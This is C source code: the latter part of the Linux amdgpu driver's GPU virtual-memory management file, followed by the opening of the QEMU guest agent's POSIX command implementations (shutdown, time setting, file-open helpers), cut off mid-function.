*/ int amdgpu_vm_bo_unmap(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, uint64_t saddr) { struct amdgpu_bo_va_mapping *mapping; struct amdgpu_vm *vm = bo_va->base.vm; bool valid = true; saddr /= AMDGPU_GPU_PAGE_SIZE; list_for_each_entry(mapping, &bo_va->valids, list) { if (mapping->start == saddr) break; } if (&mapping->list == &bo_va->valids) { valid = false; list_for_each_entry(mapping, &bo_va->invalids, list) { if (mapping->start == saddr) break; } if (&mapping->list == &bo_va->invalids) return -ENOENT; } list_del(&mapping->list); amdgpu_vm_it_remove(mapping, &vm->va); mapping->bo_va = NULL; trace_amdgpu_vm_bo_unmap(bo_va, mapping); if (valid) list_add(&mapping->list, &vm->freed); else amdgpu_vm_free_mapping(adev, vm, mapping, bo_va->last_pt_update); return 0; } /** * amdgpu_vm_bo_clear_mappings - remove all mappings in a specific range * * @adev: amdgpu_device pointer * @vm: VM structure to use * @saddr: start of the range * @size: size of the range * * Remove all mappings in a range, split them as appropriate. * Returns 0 for success, error for failure. */ int amdgpu_vm_bo_clear_mappings(struct amdgpu_device *adev, struct amdgpu_vm *vm, uint64_t saddr, uint64_t size) { struct amdgpu_bo_va_mapping *before, *after, *tmp, *next; LIST_HEAD(removed); uint64_t eaddr; eaddr = saddr + size - 1; saddr /= AMDGPU_GPU_PAGE_SIZE; eaddr /= AMDGPU_GPU_PAGE_SIZE; /* Allocate all the needed memory */ before = kzalloc(sizeof(*before), GFP_KERNEL); if (!before) return -ENOMEM; INIT_LIST_HEAD(&before->list); after = kzalloc(sizeof(*after), GFP_KERNEL); if (!after) { kfree(before); return -ENOMEM; } INIT_LIST_HEAD(&after->list); /* Now gather all removed mappings */ tmp = amdgpu_vm_it_iter_first(&vm->va, saddr, eaddr); while (tmp) { /* Remember mapping split at the start */ if (tmp->start < saddr) { before->start = tmp->start; before->last = saddr - 1; before->offset = tmp->offset; before->flags = tmp->flags; list_add(&before->list, &tmp->list); } /* Remember mapping split at the end */ if (tmp->last > eaddr) { after->start = eaddr + 1; after->last = tmp->last; after->offset = tmp->offset; after->offset += after->start - tmp->start; after->flags = tmp->flags; list_add(&after->list, &tmp->list); } list_del(&tmp->list); list_add(&tmp->list, &removed); tmp = amdgpu_vm_it_iter_next(tmp, saddr, eaddr); } /* And free them up */ list_for_each_entry_safe(tmp, next, &removed, list) { amdgpu_vm_it_remove(tmp, &vm->va); list_del(&tmp->list); if (tmp->start < saddr) tmp->start = saddr; if (tmp->last > eaddr) tmp->last = eaddr; tmp->bo_va = NULL; list_add(&tmp->list, &vm->freed); trace_amdgpu_vm_bo_unmap(NULL, tmp); } /* Insert partial mapping before the range */ if (!list_empty(&before->list)) { amdgpu_vm_it_insert(before, &vm->va); if (before->flags & AMDGPU_PTE_PRT) amdgpu_vm_prt_get(adev); } else { kfree(before); } /* Insert partial mapping after the range */ if (!list_empty(&after->list)) { amdgpu_vm_it_insert(after, &vm->va); if (after->flags & AMDGPU_PTE_PRT) amdgpu_vm_prt_get(adev); } else { kfree(after); } return 0; } /** * amdgpu_vm_bo_lookup_mapping - find mapping by address * * @vm: the requested VM * @addr: the address to look up * * Find a mapping by its address. */ struct amdgpu_bo_va_mapping *amdgpu_vm_bo_lookup_mapping(struct amdgpu_vm *vm, uint64_t addr) { return amdgpu_vm_it_iter_first(&vm->va, addr, addr); } /** * amdgpu_vm_bo_rmv - remove a bo from a specific vm * * @adev: amdgpu_device pointer * @bo_va: requested bo_va * * Remove @bo_va->bo from the requested vm. * * Object has to be reserved!
 */
void amdgpu_vm_bo_rmv(struct amdgpu_device *adev,
		      struct amdgpu_bo_va *bo_va)
{
	struct amdgpu_bo_va_mapping *mapping, *next;
	struct amdgpu_vm *vm = bo_va->base.vm;

	list_del(&bo_va->base.bo_list);

	spin_lock(&vm->status_lock);
	list_del(&bo_va->base.vm_status);
	spin_unlock(&vm->status_lock);

	list_for_each_entry_safe(mapping, next, &bo_va->valids, list) {
		list_del(&mapping->list);
		amdgpu_vm_it_remove(mapping, &vm->va);
		mapping->bo_va = NULL;
		trace_amdgpu_vm_bo_unmap(bo_va, mapping);
		list_add(&mapping->list, &vm->freed);
	}
	list_for_each_entry_safe(mapping, next, &bo_va->invalids, list) {
		list_del(&mapping->list);
		amdgpu_vm_it_remove(mapping, &vm->va);
		amdgpu_vm_free_mapping(adev, vm, mapping,
				       bo_va->last_pt_update);
	}

	dma_fence_put(bo_va->last_pt_update);
	kfree(bo_va);
}

/**
 * amdgpu_vm_bo_invalidate - mark the bo as invalid
 *
 * @adev: amdgpu_device pointer
 * @bo: amdgpu buffer object
 * @evicted: true if the BO was evicted, false if it was just moved
 *
 * Mark @bo as invalid.
 */
void amdgpu_vm_bo_invalidate(struct amdgpu_device *adev,
			     struct amdgpu_bo *bo, bool evicted)
{
	struct amdgpu_vm_bo_base *bo_base;

	list_for_each_entry(bo_base, &bo->va, bo_list) {
		struct amdgpu_vm *vm = bo_base->vm;

		bo_base->moved = true;
		if (evicted && bo->tbo.resv == vm->root.base.bo->tbo.resv) {
			spin_lock(&bo_base->vm->status_lock);
			if (bo->tbo.type == ttm_bo_type_kernel)
				list_move(&bo_base->vm_status, &vm->evicted);
			else
				list_move_tail(&bo_base->vm_status,
					       &vm->evicted);
			spin_unlock(&bo_base->vm->status_lock);
			continue;
		}

		if (bo->tbo.type == ttm_bo_type_kernel) {
			spin_lock(&bo_base->vm->status_lock);
			if (list_empty(&bo_base->vm_status))
				list_add(&bo_base->vm_status, &vm->relocated);
			spin_unlock(&bo_base->vm->status_lock);
			continue;
		}

		spin_lock(&bo_base->vm->status_lock);
		if (list_empty(&bo_base->vm_status))
			list_add(&bo_base->vm_status, &vm->moved);
		spin_unlock(&bo_base->vm->status_lock);
	}
}

static uint32_t amdgpu_vm_get_block_size(uint64_t vm_size)
{
	/* Total bits covered by PD + PTs */
	unsigned bits = ilog2(vm_size) + 18;

	/* Make sure the PD is 4K in size up to 8GB address space.
	   Above that split equal between PD and PTs */
	if (vm_size <= 8)
		return (bits - 9);
	else
		return ((bits + 3) / 2);
}

/**
 * amdgpu_vm_adjust_size - adjust vm size, block size and fragment size
 *
 * @adev: amdgpu_device pointer
 * @vm_size: the default VM size if it's set to auto
 * @fragment_size_default: default PTE fragment size
 * @max_level: max VMPT level
 * @max_bits: max address space size in bits
 */
void amdgpu_vm_adjust_size(struct amdgpu_device *adev, uint32_t vm_size,
			   uint32_t fragment_size_default, unsigned max_level,
			   unsigned max_bits)
{
	uint64_t tmp;

	/* adjust vm size first */
	if (amdgpu_vm_size != -1) {
		unsigned max_size = 1 << (max_bits - 30);

		vm_size = amdgpu_vm_size;
		if (vm_size > max_size) {
			dev_warn(adev->dev, "VM size (%d) too large, max is %u GB\n",
				 amdgpu_vm_size, max_size);
			vm_size = max_size;
		}
	}

	adev->vm_manager.max_pfn = (uint64_t)vm_size << 18;

	tmp = roundup_pow_of_two(adev->vm_manager.max_pfn);
	if (amdgpu_vm_block_size != -1)
		tmp >>= amdgpu_vm_block_size - 9;
	tmp = DIV_ROUND_UP(fls64(tmp) - 1, 9) - 1;
	adev->vm_manager.num_level = min(max_level, (unsigned)tmp);
	switch (adev->vm_manager.num_level) {
	case 3:
		adev->vm_manager.root_level = AMDGPU_VM_PDB2;
		break;
	case 2:
		adev->vm_manager.root_level = AMDGPU_VM_PDB1;
		break;
	case 1:
		adev->vm_manager.root_level = AMDGPU_VM_PDB0;
		break;
	default:
		dev_err(adev->dev, "VMPT only supports 2~4+1 levels\n");
	}
	/* block size depends on vm size and hw setup */
	if (amdgpu_vm_block_size != -1)
		adev->vm_manager.block_size =
			min((unsigned)amdgpu_vm_block_size, max_bits
			    - AMDGPU_GPU_PAGE_SHIFT
			    - 9 * adev->vm_manager.num_level);
	else if (adev->vm_manager.num_level > 1)
		adev->vm_manager.block_size = 9;
	else
		adev->vm_manager.block_size = amdgpu_vm_get_block_size(tmp);

	if (amdgpu_vm_fragment_size == -1)
		adev->vm_manager.fragment_size = fragment_size_default;
	else
		adev->vm_manager.fragment_size = amdgpu_vm_fragment_size;

	DRM_INFO("vm size is %u GB, %u levels, block size is %u-bit, fragment size is %u-bit\n",
		 vm_size, adev->vm_manager.num_level + 1,
		 adev->vm_manager.block_size,
		 adev->vm_manager.fragment_size);
}

/**
 * amdgpu_vm_init - initialize a vm instance
 *
 * @adev: amdgpu_device pointer
 * @vm: requested vm
 * @vm_context: indicates whether it is a GFX or Compute context
 * @pasid: Process Address Space IDentifier, or 0 if none is needed
 *
 * Init @vm fields.
 */
int amdgpu_vm_init(struct amdgpu_device *adev, struct amdgpu_vm *vm,
		   int vm_context, unsigned int pasid)
{
	const unsigned align = min(AMDGPU_VM_PTB_ALIGN_SIZE,
				   AMDGPU_VM_PTE_COUNT(adev) * 8);
	unsigned ring_instance;
	struct amdgpu_ring *ring;
	struct drm_sched_rq *rq;
	unsigned long size;
	uint64_t flags;
	int r, i;

	vm->va = RB_ROOT_CACHED;
	for (i = 0; i < AMDGPU_MAX_VMHUBS; i++)
		vm->reserved_vmid[i] = NULL;
	spin_lock_init(&vm->status_lock);
	INIT_LIST_HEAD(&vm->evicted);
	INIT_LIST_HEAD(&vm->relocated);
	INIT_LIST_HEAD(&vm->moved);
	INIT_LIST_HEAD(&vm->freed);

	/* create scheduler entity for page table updates */
	ring_instance = atomic_inc_return(&adev->vm_manager.vm_pte_next_ring);
	ring_instance %= adev->vm_manager.vm_pte_num_rings;
	ring = adev->vm_manager.vm_pte_rings[ring_instance];
	rq = &ring->sched.sched_rq[DRM_SCHED_PRIORITY_KERNEL];
	r = drm_sched_entity_init(&ring->sched, &vm->entity,
				  rq, amdgpu_sched_jobs, NULL);
	if (r)
		return r;

	vm->pte_support_ats = false;

	if (vm_context == AMDGPU_VM_CONTEXT_COMPUTE) {
		vm->use_cpu_for_update = !!(adev->vm_manager.vm_update_mode &
						AMDGPU_VM_USE_CPU_FOR_COMPUTE);

		if (adev->asic_type == CHIP_RAVEN)
			vm->pte_support_ats = true;
	} else {
		vm->use_cpu_for_update = !!(adev->vm_manager.vm_update_mode &
						AMDGPU_VM_USE_CPU_FOR_GFX);
	}
	DRM_DEBUG_DRIVER("VM update mode is %s\n",
			 vm->use_cpu_for_update ?
"CPU" : "SDMA"); WARN_ONCE((vm->use_cpu_for_update & !amdgpu_vm_is_large_bar(adev)), "CPU update of VM recommended only for large BAR system\n"); vm->last_update = NULL; flags = AMDGPU_GEM_CREATE_VRAM_CONTIGUOUS; if (vm->use_cpu_for_update) flags |= AMDGPU_GEM_CREATE_CPU_ACCESS_REQUIRED; else flags |= AMDGPU_GEM_CREATE_SHADOW; size = amdgpu_vm_bo_size(adev, adev->vm_manager.root_level); r = amdgpu_bo_create(adev, size, align, AMDGPU_GEM_DOMAIN_VRAM, flags, ttm_bo_type_kernel, NULL, &vm->root.base.bo); if (r) goto error_free_sched_entity; r = amdgpu_bo_reserve(vm->root.base.bo, true); if (r) goto error_free_root; r = amdgpu_vm_clear_bo(adev, vm, vm->root.base.bo, adev->vm_manager.root_level, vm->pte_support_ats); if (r) goto error_unreserve; vm->root.base.vm = vm; list_add_tail(&vm->root.base.bo_list, &vm->root.base.bo->va); list_add_tail(&vm->root.base.vm_status, &vm->evicted); amdgpu_bo_unreserve(vm->root.base.bo); if (pasid) { unsigned long flags; spin_lock_irqsave(&adev->vm_manager.pasid_lock, flags); r = idr_alloc(&adev->vm_manager.pasid_idr, vm, pasid, pasid + 1, GFP_ATOMIC); spin_unlock_irqrestore(&adev->vm_manager.pasid_lock, flags); if (r < 0) goto error_free_root; vm->pasid = pasid; } INIT_KFIFO(vm->faults); vm->fault_credit = 16; return 0; error_unreserve: amdgpu_bo_unreserve(vm->root.base.bo); error_free_root: amdgpu_bo_unref(&vm->root.base.bo->shadow); amdgpu_bo_unref(&vm->root.base.bo); vm->root.base.bo = NULL; error_free_sched_entity: drm_sched_entity_fini(&ring->sched, &vm->entity); return r; } /** * amdgpu_vm_make_compute - Turn a GFX VM into a compute VM * * This only works on GFX VMs that don't have any BOs added and no * page tables allocated yet. * * Changes the following VM parameters: * - use_cpu_for_update * - pte_supports_ats * - pasid (old PASID is released, because compute manages its own PASIDs) * * Reinitializes the page directory to reflect the changed ATS * setting. May leave behind an unused shadow BO for the page * directory when switching from SDMA updates to CPU updates. * * Returns 0 for success, -errno for errors. */ int amdgpu_vm_make_compute(struct amdgpu_device *adev, struct amdgpu_vm *vm) { bool pte_support_ats = (adev->asic_type == CHIP_RAVEN); int r; r = amdgpu_bo_reserve(vm->root.base.bo, true); if (r) return r; /* Sanity checks */ if (!RB_EMPTY_ROOT(&vm->va.rb_root) || vm->root.entries) { r = -EINVAL; goto error; } /* Check if PD needs to be reinitialized and do it before * changing any other state, in case it fails. */ if (pte_support_ats != vm->pte_support_ats) { r = amdgpu_vm_clear_bo(adev, vm, vm->root.base.bo, adev->vm_manager.root_level, pte_support_ats); if (r) goto error; } /* Update VM state */ vm->use_cpu_for_update = !!(adev->vm_manager.vm_update_mode & AMDGPU_VM_USE_CPU_FOR_COMPUTE); vm->pte_support_ats = pte_support_ats; DRM_DEBUG_DRIVER("VM update mode is %s\n", vm->use_cpu_for_update ? "CPU" : "SDMA"); WARN_ONCE((vm->use_cpu_for_update & !amdgpu_vm_is_large_bar(adev)), "CPU update of VM recommended only for large BAR system\n"); if (vm->pasid) { unsigned long flags; spin_lock_irqsave(&adev->vm_manager.pasid_lock, flags); idr_remove(&adev->vm_manager.pasid_idr, vm->pasid); spin_unlock_irqrestore(&adev->vm_manager.pasid_lock, flags); vm->pasid = 0; } error: amdgpu_bo_unreserve(vm->root.base.bo); return r; } /** * amdgpu_vm_free_levels - free PD/PT levels * * @adev: amdgpu device structure * @parent: PD/PT starting level to free * @level: level of parent structure * * Free the page directory or page table level and all sub levels. 
 */
static void amdgpu_vm_free_levels(struct amdgpu_device *adev,
				  struct amdgpu_vm_pt *parent,
				  unsigned level)
{
	unsigned i, num_entries = amdgpu_vm_num_entries(adev, level);

	if (parent->base.bo) {
		list_del(&parent->base.bo_list);
		list_del(&parent->base.vm_status);
		amdgpu_bo_unref(&parent->base.bo->shadow);
		amdgpu_bo_unref(&parent->base.bo);
	}

	if (parent->entries)
		for (i = 0; i < num_entries; i++)
			amdgpu_vm_free_levels(adev, &parent->entries[i],
					      level + 1);

	kvfree(parent->entries);
}

/**
 * amdgpu_vm_fini - tear down a vm instance
 *
 * @adev: amdgpu_device pointer
 * @vm: requested vm
 *
 * Tear down @vm.
 * Unbind the VM and remove all bos from the vm bo list
 */
void amdgpu_vm_fini(struct amdgpu_device *adev, struct amdgpu_vm *vm)
{
	struct amdgpu_bo_va_mapping *mapping, *tmp;
	bool prt_fini_needed = !!adev->gmc.gmc_funcs->set_prt;
	struct amdgpu_bo *root;
	u64 fault;
	int i, r;

	amdgpu_amdkfd_gpuvm_destroy_cb(adev, vm);

	/* Clear pending page faults from IH when the VM is destroyed */
	while (kfifo_get(&vm->faults, &fault))
		amdgpu_ih_clear_fault(adev, fault);

	if (vm->pasid) {
		unsigned long flags;

		spin_lock_irqsave(&adev->vm_manager.pasid_lock, flags);
		idr_remove(&adev->vm_manager.pasid_idr, vm->pasid);
		spin_unlock_irqrestore(&adev->vm_manager.pasid_lock, flags);
	}

	drm_sched_entity_fini(vm->entity.sched, &vm->entity);

	if (!RB_EMPTY_ROOT(&vm->va.rb_root)) {
		dev_err(adev->dev, "still active bo inside vm\n");
	}
	rbtree_postorder_for_each_entry_safe(mapping, tmp,
					     &vm->va.rb_root, rb) {
		list_del(&mapping->list);
		amdgpu_vm_it_remove(mapping, &vm->va);
		kfree(mapping);
	}
	list_for_each_entry_safe(mapping, tmp, &vm->freed, list) {
		if (mapping->flags & AMDGPU_PTE_PRT && prt_fini_needed) {
			amdgpu_vm_prt_fini(adev, vm);
			prt_fini_needed = false;
		}

		list_del(&mapping->list);
		amdgpu_vm_free_mapping(adev, vm, mapping, NULL);
	}

	root = amdgpu_bo_ref(vm->root.base.bo);
	r = amdgpu_bo_reserve(root, true);
	if (r) {
		dev_err(adev->dev, "Leaking page tables because BO reservation failed\n");
	} else {
		amdgpu_vm_free_levels(adev, &vm->root,
				      adev->vm_manager.root_level);
		amdgpu_bo_unreserve(root);
	}
	amdgpu_bo_unref(&root);
	dma_fence_put(vm->last_update);
	for (i = 0; i < AMDGPU_MAX_VMHUBS; i++)
		amdgpu_vmid_free_reserved(adev, vm, i);
}

/**
 * amdgpu_vm_pasid_fault_credit - Check fault credit for given PASID
 *
 * @adev: amdgpu_device pointer
 * @pasid: PASID to identify the VM
 *
 * This function is expected to be called in interrupt context. Returns
 * true if there was fault credit, false otherwise
 */
bool amdgpu_vm_pasid_fault_credit(struct amdgpu_device *adev,
				  unsigned int pasid)
{
	struct amdgpu_vm *vm;

	spin_lock(&adev->vm_manager.pasid_lock);
	vm = idr_find(&adev->vm_manager.pasid_idr, pasid);
	if (!vm) {
		/* VM not found, can't track fault credit */
		spin_unlock(&adev->vm_manager.pasid_lock);
		return true;
	}

	/* No lock needed.
	   only accessed by IRQ handler */
	if (!vm->fault_credit) {
		/* Too many faults in this VM */
		spin_unlock(&adev->vm_manager.pasid_lock);
		return false;
	}

	vm->fault_credit--;
	spin_unlock(&adev->vm_manager.pasid_lock);
	return true;
}

/**
 * amdgpu_vm_manager_init - init the VM manager
 *
 * @adev: amdgpu_device pointer
 *
 * Initialize the VM manager structures
 */
void amdgpu_vm_manager_init(struct amdgpu_device *adev)
{
	unsigned i;

	amdgpu_vmid_mgr_init(adev);

	adev->vm_manager.fence_context =
		dma_fence_context_alloc(AMDGPU_MAX_RINGS);
	for (i = 0; i < AMDGPU_MAX_RINGS; ++i)
		adev->vm_manager.seqno[i] = 0;

	atomic_set(&adev->vm_manager.vm_pte_next_ring, 0);
	spin_lock_init(&adev->vm_manager.prt_lock);
	atomic_set(&adev->vm_manager.num_prt_users, 0);

	/* If not overridden by the user, by default, only in large BAR systems
	 * Compute VM tables will be updated by CPU
	 */
#ifdef CONFIG_X86_64
	if (amdgpu_vm_update_mode == -1) {
		if (amdgpu_vm_is_large_bar(adev))
			adev->vm_manager.vm_update_mode =
				AMDGPU_VM_USE_CPU_FOR_COMPUTE;
		else
			adev->vm_manager.vm_update_mode = 0;
	} else
		adev->vm_manager.vm_update_mode = amdgpu_vm_update_mode;
#else
	adev->vm_manager.vm_update_mode = 0;
#endif

	idr_init(&adev->vm_manager.pasid_idr);
	spin_lock_init(&adev->vm_manager.pasid_lock);
}

/**
 * amdgpu_vm_manager_fini - cleanup VM manager
 *
 * @adev: amdgpu_device pointer
 *
 * Cleanup the VM manager and free resources.
 */
void amdgpu_vm_manager_fini(struct amdgpu_device *adev)
{
	WARN_ON(!idr_is_empty(&adev->vm_manager.pasid_idr));
	idr_destroy(&adev->vm_manager.pasid_idr);

	amdgpu_vmid_mgr_fini(adev);
}

int amdgpu_vm_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
{
	union drm_amdgpu_vm *args = data;
	struct amdgpu_device *adev = dev->dev_private;
	struct amdgpu_fpriv *fpriv = filp->driver_priv;
	int r;

	switch (args->in.op) {
	case AMDGPU_VM_OP_RESERVE_VMID:
		/* currently, we only have the requirement to reserve a vmid
		 * from the gfxhub */
		r = amdgpu_vmid_alloc_reserved(adev, &fpriv->vm,
					       AMDGPU_GFXHUB);
		if (r)
			return r;
		break;
	case AMDGPU_VM_OP_UNRESERVE_VMID:
		amdgpu_vmid_free_reserved(adev, &fpriv->vm, AMDGPU_GFXHUB);
		break;
	default:
		return -EINVAL;
	}

	return 0;
}
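/*
 * Worked example for the validation math in amdgpu_vm_bo_map() and
 * amdgpu_vm_bo_replace_map() above, assuming the usual 4 KiB GPU page
 * (AMDGPU_GPU_PAGE_SIZE == 4096, AMDGPU_GPU_PAGE_MASK == 0xfff); the
 * concrete numbers are illustrative only:
 *
 *   saddr = 0x1000, size = 0x2000 -> eaddr = 0x2fff; after dividing by
 *       the page size the mapping covers GPU pages 1..2 inclusive and
 *       is handed to the interval tree as [1, 2].
 *   saddr = 0x1800, size = 0x2000 -> rejected with -EINVAL, because
 *       saddr & AMDGPU_GPU_PAGE_MASK != 0 (start not page aligned).
 *   saddr = 0x1000, size = 0      -> rejected with -EINVAL (empty mapping).
 *
 * Because eaddr is computed as saddr + size - 1, both bounds are
 * inclusive, which is what amdgpu_vm_it_iter_first() expects for the
 * overlap check.
 */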
967243.c
/*
 * QEMU Guest Agent POSIX-specific command implementations
 *
 * Copyright IBM Corp. 2011
 *
 * Authors:
 *  Michael Roth      <mdroth@linux.vnet.ibm.com>
 *  Michal Privoznik  <mprivozn@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#include "qemu/osdep.h"
#include <sys/ioctl.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <dirent.h>
#include "guest-agent-core.h"
#include "qga-qapi-commands.h"
#include "qapi/error.h"
#include "qapi/qmp/qerror.h"
#include "qemu/queue.h"
#include "qemu/host-utils.h"
#include "qemu/sockets.h"
#include "qemu/base64.h"
#include "qemu/cutils.h"

#ifdef HAVE_UTMPX
#include <utmpx.h>
#endif

#ifndef CONFIG_HAS_ENVIRON
#ifdef __APPLE__
#include <crt_externs.h>
#define environ (*_NSGetEnviron())
#else
extern char **environ;
#endif
#endif

#if defined(__linux__)
#include <mntent.h>
#include <linux/fs.h>
#include <ifaddrs.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/statvfs.h>

#ifdef CONFIG_LIBUDEV
#include <libudev.h>
#endif

#ifdef FIFREEZE
#define CONFIG_FSFREEZE
#endif
#ifdef FITRIM
#define CONFIG_FSTRIM
#endif
#endif

static void ga_wait_child(pid_t pid, int *status, Error **errp)
{
    pid_t rpid;

    *status = 0;

    do {
        rpid = waitpid(pid, status, 0);
    } while (rpid == -1 && errno == EINTR);

    if (rpid == -1) {
        error_setg_errno(errp, errno, "failed to wait for child (pid: %d)",
                         pid);
        return;
    }

    g_assert(rpid == pid);
}

void qmp_guest_shutdown(bool has_mode, const char *mode, Error **errp)
{
    const char *shutdown_flag;
    Error *local_err = NULL;
    pid_t pid;
    int status;

    slog("guest-shutdown called, mode: %s", mode);
    if (!has_mode || strcmp(mode, "powerdown") == 0) {
        shutdown_flag = "-P";
    } else if (strcmp(mode, "halt") == 0) {
        shutdown_flag = "-H";
    } else if (strcmp(mode, "reboot") == 0) {
        shutdown_flag = "-r";
    } else {
        error_setg(errp,
                   "mode is invalid (valid values are: halt|powerdown|reboot)");
        return;
    }

    pid = fork();
    if (pid == 0) {
        /* child, start the shutdown */
        setsid();
        reopen_fd_to_null(0);
        reopen_fd_to_null(1);
        reopen_fd_to_null(2);

        execle("/sbin/shutdown", "shutdown", "-h", shutdown_flag, "+0",
               "hypervisor initiated shutdown", (char *)NULL, environ);
        _exit(EXIT_FAILURE);
    } else if (pid < 0) {
        error_setg_errno(errp, errno, "failed to create child process");
        return;
    }

    ga_wait_child(pid, &status, &local_err);
    if (local_err) {
        error_propagate(errp, local_err);
        return;
    }

    if (!WIFEXITED(status)) {
        error_setg(errp, "child process has terminated abnormally");
        return;
    }

    if (WEXITSTATUS(status)) {
        error_setg(errp, "child process has failed to shutdown");
        return;
    }

    /* succeeded */
}

int64_t qmp_guest_get_time(Error **errp)
{
    int ret;
    qemu_timeval tq;

    ret = qemu_gettimeofday(&tq);
    if (ret < 0) {
        error_setg_errno(errp, errno, "Failed to get time");
        return -1;
    }

    return tq.tv_sec * 1000000000LL + tq.tv_usec * 1000;
}

void qmp_guest_set_time(bool has_time, int64_t time_ns, Error **errp)
{
    int ret;
    int status;
    pid_t pid;
    Error *local_err = NULL;
    struct timeval tv;

    /* If user has passed a time, validate and set it.
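     * time_ns is nanoseconds since the UNIX epoch, per the guest-set-time
     * schema.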
*/ if (has_time) { GDate date = { 0, }; /* year-2038 will overflow in case time_t is 32bit */ if (time_ns / 1000000000 != (time_t)(time_ns / 1000000000)) { error_setg(errp, "Time %" PRId64 " is too large", time_ns); return; } tv.tv_sec = time_ns / 1000000000; tv.tv_usec = (time_ns % 1000000000) / 1000; g_date_set_time_t(&date, tv.tv_sec); if (date.year < 1970 || date.year >= 2070) { error_setg_errno(errp, errno, "Invalid time"); return; } ret = settimeofday(&tv, NULL); if (ret < 0) { error_setg_errno(errp, errno, "Failed to set time to guest"); return; } } /* Now, if user has passed a time to set and the system time is set, we * just need to synchronize the hardware clock. However, if no time was * passed, user is requesting the opposite: set the system time from the * hardware clock (RTC). */ pid = fork(); if (pid == 0) { setsid(); reopen_fd_to_null(0); reopen_fd_to_null(1); reopen_fd_to_null(2); /* Use '/sbin/hwclock -w' to set RTC from the system time, * or '/sbin/hwclock -s' to set the system time from RTC. */ execle("/sbin/hwclock", "hwclock", has_time ? "-w" : "-s", NULL, environ); _exit(EXIT_FAILURE); } else if (pid < 0) { error_setg_errno(errp, errno, "failed to create child process"); return; } ga_wait_child(pid, &status, &local_err); if (local_err) { error_propagate(errp, local_err); return; } if (!WIFEXITED(status)) { error_setg(errp, "child process has terminated abnormally"); return; } if (WEXITSTATUS(status)) { error_setg(errp, "hwclock failed to set hardware clock to system time"); return; } } typedef enum { RW_STATE_NEW, RW_STATE_READING, RW_STATE_WRITING, } RwState; typedef struct GuestFileHandle { uint64_t id; FILE *fh; RwState state; QTAILQ_ENTRY(GuestFileHandle) next; } GuestFileHandle; static struct { QTAILQ_HEAD(, GuestFileHandle) filehandles; } guest_file_state = { .filehandles = QTAILQ_HEAD_INITIALIZER(guest_file_state.filehandles), }; static int64_t guest_file_handle_add(FILE *fh, Error **errp) { GuestFileHandle *gfh; int64_t handle; handle = ga_get_fd_handle(ga_state, errp); if (handle < 0) { return -1; } gfh = g_new0(GuestFileHandle, 1); gfh->id = handle; gfh->fh = fh; QTAILQ_INSERT_TAIL(&guest_file_state.filehandles, gfh, next); return handle; } static GuestFileHandle *guest_file_handle_find(int64_t id, Error **errp) { GuestFileHandle *gfh; QTAILQ_FOREACH(gfh, &guest_file_state.filehandles, next) { if (gfh->id == id) { return gfh; } } error_setg(errp, "handle '%" PRId64 "' has not been found", id); return NULL; } typedef const char * const ccpc; #ifndef O_BINARY #define O_BINARY 0 #endif /* http://pubs.opengroup.org/onlinepubs/9699919799/functions/fopen.html */ static const struct { ccpc *forms; int oflag_base; } guest_file_open_modes[] = { { (ccpc[]){ "r", NULL }, O_RDONLY }, { (ccpc[]){ "rb", NULL }, O_RDONLY | O_BINARY }, { (ccpc[]){ "w", NULL }, O_WRONLY | O_CREAT | O_TRUNC }, { (ccpc[]){ "wb", NULL }, O_WRONLY | O_CREAT | O_TRUNC | O_BINARY }, { (ccpc[]){ "a", NULL }, O_WRONLY | O_CREAT | O_APPEND }, { (ccpc[]){ "ab", NULL }, O_WRONLY | O_CREAT | O_APPEND | O_BINARY }, { (ccpc[]){ "r+", NULL }, O_RDWR }, { (ccpc[]){ "rb+", "r+b", NULL }, O_RDWR | O_BINARY }, { (ccpc[]){ "w+", NULL }, O_RDWR | O_CREAT | O_TRUNC }, { (ccpc[]){ "wb+", "w+b", NULL }, O_RDWR | O_CREAT | O_TRUNC | O_BINARY }, { (ccpc[]){ "a+", NULL }, O_RDWR | O_CREAT | O_APPEND }, { (ccpc[]){ "ab+", "a+b", NULL }, O_RDWR | O_CREAT | O_APPEND | O_BINARY } }; static int find_open_flag(const char *mode_str, Error **errp) { unsigned mode; for (mode = 0; mode < ARRAY_SIZE(guest_file_open_modes); 
++mode) { ccpc *form; form = guest_file_open_modes[mode].forms; while (*form != NULL && strcmp(*form, mode_str) != 0) { ++form; } if (*form != NULL) { break; } } if (mode == ARRAY_SIZE(guest_file_open_modes)) { error_setg(errp, "invalid file open mode '%s'", mode_str); return -1; } return guest_file_open_modes[mode].oflag_base | O_NOCTTY | O_NONBLOCK; } #define DEFAULT_NEW_FILE_MODE (S_IRUSR | S_IWUSR | \ S_IRGRP | S_IWGRP | \ S_IROTH | S_IWOTH) static FILE * safe_open_or_create(const char *path, const char *mode, Error **errp) { Error *local_err = NULL; int oflag; oflag = find_open_flag(mode, &local_err); if (local_err == NULL) { int fd; /* If the caller wants / allows creation of a new file, we implement it * with a two step process: open() + (open() / fchmod()). * * First we insist on creating the file exclusively as a new file. If * that succeeds, we're free to set any file-mode bits on it. (The * motivation is that we want to set those file-mode bits independently * of the current umask.) * * If the exclusive creation fails because the file already exists * (EEXIST is not possible for any other reason), we just attempt to * open the file, but in this case we won't be allowed to change the * file-mode bits on the preexistent file. * * The pathname should never disappear between the two open()s in * practice. If it happens, then someone very likely tried to race us. * In this case just go ahead and report the ENOENT from the second * open() to the caller. * * If the caller wants to open a preexistent file, then the first * open() is decisive and its third argument is ignored, and the second * open() and the fchmod() are never called. */ fd = open(path, oflag | ((oflag & O_CREAT) ? O_EXCL : 0), 0); if (fd == -1 && errno == EEXIST) { oflag &= ~(unsigned)O_CREAT; fd = open(path, oflag); } if (fd == -1) { error_setg_errno(&local_err, errno, "failed to open file '%s' " "(mode: '%s')", path, mode); } else { qemu_set_cloexec(fd); if ((oflag & O_CREAT) && fchmod(fd, DEFAULT_NEW_FILE_MODE) == -1) { error_setg_errno(&local_err, errno, "failed to set permission " "0%03o on new file '%s' (mode: '%s')", (unsigned)DEFAULT_NEW_FILE_MODE, path, mode); } else { FILE *f; f = fdopen(fd, mode); if (f == NULL) { error_setg_errno(&local_err, errno, "failed to associate " "stdio stream with file descriptor %d, " "file '%s' (mode: '%s')", fd, path, mode); } else { return f; } } close(fd); if (oflag & O_CREAT) { unlink(path); } } } error_propagate(errp, local_err); return NULL; } int64_t qmp_guest_file_open(const char 